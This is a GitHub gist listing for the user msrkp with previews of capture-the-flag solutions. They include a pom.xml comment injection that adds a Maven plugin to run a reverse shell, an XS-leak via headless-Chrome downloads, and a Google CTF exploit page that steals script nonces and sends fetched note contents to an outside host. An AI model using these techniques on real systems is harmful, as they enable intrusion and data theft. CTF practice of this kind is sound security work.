Skip to content

Instantly share code, notes, and snippets.

Avatar
🚩
Trying harder

s1r1us msrkp

🚩
Trying harder
View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am msrkp on github.
  • I am s1r1us (https://keybase.io/s1r1us) on keybase.
  • I have a public key whose fingerprint is 00AD 378C CEB2 0955 8E61 4EED 5386 F2DB 6741 F532

To claim this, I am signing this object:

@msrkp
msrkp / sol.md
Last active May 16, 2021
OMH CTF Solutions
View sol.md

code_review solution

Add comment in text node of plugin configuration in pom.xml file. This comment will add new plugin and executes reverse shell

<plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <version>2.22.2</version>
                <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
 <plugin>
 org.codehaus.mojo
@msrkp
msrkp / exp.md
Last active Mar 22, 2021
LineCTF - Your Note script to perform XS-leaks to read the flag.
View exp.md

XS-leaks while download in headless-chrome.

TL;DR

There is a feature to search the note and a download option, so visiting the following page http://34.84.72.167/search?q=LINECTF{&download downloads a json file if the param value of q exists in notes.

Download doesn't work in headless chrome, so it throws an error.

oracle

 page.goto(url).then(() =&gt; {
@msrkp
msrkp / exp.html
Created Aug 24, 2020
Google CTF All the Little Things solution
View exp.html
<!DOCTYPE html>
<html>
<head>
<script>
x= `
<iframe name=x title='fetch(&#x22;/note&#x22;).then(x=>x.text()).then(x=>top.location=&#x22;//ctf.s1r1us.ninja?html=&#x22;+btoa(encodeURIComponent(x)))' id=y srcdoc='<script><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.nonce=top.document.body.lastElementChild.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.nonce=top.x.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.innerHTML=top.y.title.valueOf ><\/script>'></iframe>